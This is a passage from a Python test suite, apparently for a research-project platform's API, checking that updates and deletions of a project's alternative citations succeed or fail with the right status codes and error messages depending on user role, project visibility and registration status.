logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_logged_out_private(self):
res, citation = self.request(name="Test",
text="Test",
public=False,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_repeat_name_admin_public(self):
res, citation = self.request(name="name2",
text="text",
is_admin=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "There is already a citation named 'name2'")
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_name_admin_private(self):
res, citation = self.request(name="name2",
text="text",
public=False,
is_admin=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "There is already a citation named 'name2'")
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_name_non_admin_public(self):
res, citation = self.request(name="name2",
text="text",
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_name_non_admin_private(self):
res, citation = self.request(name="name2",
text="text",
public=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_name_non_contrib_public(self):
res, citation = self.request(name="name2",
text="text",
is_contrib=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_name_non_contrib_private(self):
res, citation = self.request(name="name2",
text="text",
public=False,
is_contrib=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_name_logged_out_public(self):
res, citation = self.request(name="name2",
text="text",
logged_out=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_name_logged_out_private(self):
res, citation = self.request(name="name2",
text="text",
public=False,
logged_out=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.name, "name")
def test_update_citation_repeat_text_admin_public(self):
res, citation = self.request(name="name",
text="text2",
is_admin=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "Citation matches 'name2'")
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_text_admin_private(self):
res, citation = self.request(name="name",
text="text2",
public=False,
is_admin=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "Citation matches 'name2'")
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_text_non_admin_public(self):
res, citation = self.request(name="name",
text="text2",
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_text_non_admin_private(self):
res, citation = self.request(name="name",
text="text2",
public=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_text_non_contrib_public(self):
res, citation = self.request(name="name",
text="text2",
is_contrib=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_text_non_contrib_private(self):
res, citation = self.request(name="name",
text="text2",
public=False,
is_contrib=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_text_logged_out_public(self):
res, citation = self.request(name="name",
text="text2",
logged_out=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_text_logged_out_private(self):
res, citation = self.request(name="name",
text="text2",
public=False,
logged_out=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_admin_public(self):
res, citation = self.request(name="name2",
text="text2",
is_admin=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 2)
errors = [error['detail'] for error in res.json['errors']]
assert_in("There is already a citation named 'name2'", errors)
assert_in("Citation matches 'name2'", errors)
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_repeat_admin_private(self):
res, citation = self.request(name="name2",
text="text2",
public=False,
is_admin=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 2)
errors = [error['detail'] for error in res.json['errors']]
assert_in("There is already a citation named 'name2'", errors)
assert_in("Citation matches 'name2'", errors)
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_repeat_non_admin_public(self):
res, citation = self.request(name="name2",
text="text2",
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_repeat_non_admin_private(self):
res, citation = self.request(name="name2",
text="text2",
public=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_repeat_non_contrib_public(self):
res, citation = self.request(name="name2",
text="text2",
is_contrib=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_repeat_non_contrib_private(self):
res, citation = self.request(name="name2",
text="text2",
public=False,
is_contrib=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_repeat_logged_out_public(self):
res, citation = self.request(name="name2",
text="text2",
logged_out=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_repeat_logged_out_private(self):
res, citation = self.request(name="name2",
text="text2",
public=False,
logged_out=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_admin_public(self):
res, citation = self.request(is_admin=True,
patch=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], 'name')
assert_equal(res.json['data']['attributes']['text'], 'text')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_admin_private(self):
res, citation = self.request(public=False,
is_admin=True,
patch=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], 'name')
assert_equal(res.json['data']['attributes']['text'], 'text')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_non_admin_public(self):
res, citation = self.request(patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_non_admin_private(self):
res, citation = self.request(public=False,
patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_non_contrib_public(self):
res, citation = self.request(is_contrib=False,
patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_non_contrib_private(self):
res, citation = self.request(public=False,
is_contrib=False,
patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_logged_out_public(self):
res, citation = self.request(logged_out=True,
patch=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_logged_out_private(self):
res, citation = self.request(public=False,
logged_out=True,
patch=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_admin_public(self):
res, citation = self.request(name="new name",
patch=True,
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], 'new name')
assert_equal(res.json['data']['attributes']['text'], 'text')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "new name")
def test_update_citation_name_only_admin_private(self):
res, citation = self.request(name="new name",
public=False,
patch=True,
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], 'new name')
assert_equal(res.json['data']['attributes']['text'], 'text')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "new name")
def test_update_citation_name_only_non_admin_public(self):
res, citation = self.request(name="new name",
patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_non_admin_private(self):
res, citation = self.request(name="new name",
public=False,
patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_non_contrib_public(self):
res, citation = self.request(name="new name",
patch=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_non_contrib_private(self):
res, citation = self.request(name="new name",
public=False,
patch=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_logged_out_public(self):
res, citation = self.request(name="new name",
patch=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_logged_out_private(self):
res, citation = self.request(name="new name",
public=False,
patch=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_admin_public(self):
res, citation = self.request(text="new text",
patch=True,
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], 'name')
assert_equal(res.json['data']['attributes']['text'], 'new text')
citation.reload()
assert_equal(citation.text, "new text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_admin_private(self):
res, citation = self.request(text="new text",
public=False,
patch=True,
is_admin=True)
assert_equal(res.status_code, 200)
        assert_equal(res.json['data']['attributes']['name'], 'name')
        assert_equal(res.json['data']['attributes']['text'], 'new text')
        citation.reload()
assert_equal(citation.text, "new text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_non_admin_public(self):
res, citation = self.request(text="new text",
patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_non_admin_private(self):
res, citation = self.request(text="new text",
public=False,
patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_non_contrib_public(self):
res, citation = self.request(text="new text",
patch=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_non_contrib_private(self):
res, citation = self.request(text="new text",
public=False,
patch=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_logged_out_public(self):
res, citation = self.request(text="new text",
patch=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_logged_out_private(self):
res, citation = self.request(text="new text",
public=False,
patch=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_admin_public(self):
res, citation = self.request(name="name2",
patch=True,
citation2=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "There is already a citation named 'name2'")
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_admin_private(self):
res, citation = self.request(name="name2",
public=False,
patch=True,
citation2=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "There is already a citation named 'name2'")
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_non_admin_public(self):
res, citation = self.request(name="name2",
patch=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_non_admin_private(self):
res, citation = self.request(name="name2",
public=False,
patch=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_non_contrib_public(self):
res, citation = self.request(name="name2",
patch=True,
citation2=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_non_contrib_private(self):
res, citation = self.request(name="name2",
public=False,
patch=True,
citation2=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_logged_out_public(self):
res, citation = self.request(name="name2",
patch=True,
citation2=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_logged_out_private(self):
res, citation = self.request(name="name2",
public=False,
patch=True,
citation2=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_admin_public(self):
res, citation = self.request(text="text2",
patch=True,
citation2=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "Citation matches 'name2'")
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_admin_private(self):
res, citation = self.request(text="text2",
public=False,
patch=True,
citation2=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "Citation matches 'name2'")
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_non_admin_public(self):
res, citation = self.request(text="text2",
patch=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_non_admin_private(self):
res, citation = self.request(text="text2",
public=False,
patch=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_non_contrib_public(self):
res, citation = self.request(text="text2",
patch=True,
citation2=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_non_contrib_private(self):
res, citation = self.request(text="text2",
public=False,
patch=True,
citation2=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_logged_out_public(self):
res, citation = self.request(text="text2",
patch=True,
citation2=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_logged_out_private(self):
res, citation = self.request(text="text2",
public=False,
patch=True,
citation2=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_admin_public_reg(self):
res, citation = self.request(name="test",
text="Citation",
registration=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_admin_private_reg(self):
res, citation = self.request(name="test",
text="Citation",
public=False,
registration=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_non_admin_public_reg(self):
res, citation = self.request(name="test",
text="Citation",
registration=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_non_admin_private_reg(self):
res, citation = self.request(name="test",
text="Citation",
public=False,
registration=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_non_contrib_public_reg(self):
res, citation = self.request(name="test",
text="Citation",
registration=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_non_contrib_private_reg(self):
res, citation = self.request(name="test",
text="Citation",
public=False,
registration=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_logged_out_public_reg(self):
res, citation = self.request(name="test",
text="Citation",
registration=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_logged_out_private_reg(self):
res, citation = self.request(name="test",
text="Citation",
public=False,
registration=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
class TestDeleteAlternativeCitations(ApiTestCase):
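"""Exercises DELETE permissions on alternative citations across user roles, project visibility, and registrations."""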
def request(self, is_admin=False, is_contrib=True, logged_out=False, errors=False, **kwargs):
admin = AuthUserFactory()
if is_admin:
user = admin
else:
# A user is always created so `contrib` can be set below; `logged_out`
# only controls whether the request is sent with auth credentials.
user = AuthUserFactory()
kwargs['contrib'] = user if is_contrib else None
project, citation_url = set_up_citation_and_project(admin, for_delete=True, **kwargs)
if not logged_out:
res = self.app.delete_json_api(citation_url, auth=user.auth, expect_errors=errors)
else:
res = self.app.delete_json_api(citation_url, expect_errors=errors)
return res, project
def test_delete_citation_admin_public(self):
res, project = self.request(is_admin=True)
assert_equal(res.status_code, 204)
project.reload()
assert_equal(project.alternative_citations.count(), 0)
def test_delete_citation_admin_private(self):
res, project = self.request(public=False,
is_admin=True)
assert_equal(res.status_code, 204)
project.reload()
assert_equal(project.alternative_citations.count(), 0)
def test_delete_citation_non_admin_public(self):
res, project = self.request(errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_non_admin_private(self):
res, project = self.request(public=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_non_contrib_public(self):
res, project = self.request(is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_non_contrib_private(self):
res, project = self.request(public=False,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_logged_out_public(self):
res, project = self.request(logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_logged_out_private(self):
res, project = self.request(public=False,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_admin_not_found_public(self):
res, project = self.request(is_admin=True,
bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_admin_not_found_private(self):
res, project = self.request(public=False,
is_admin=True,
bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_non_admin_not_found_public(self):
res, project = self.request(bad=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_non_admin_not_found_private(self):
res, project = self.request(public=False,
bad=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_non_contrib_not_found_public(self):
res, project = self.request(is_contrib=False,
bad=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_non_contrib_not_found_private(self):
res, project = self.request(public=False,
is_contrib=False,
bad=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_logged_out_not_found_public(self):
res, project = self.request(logged_out=True,
bad=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_logged_out_not_found_private(self):
res, project = self.request(public=False,
logged_out=True,
bad=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_admin_public_reg(self):
res, registration = self.request(registration=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 403)
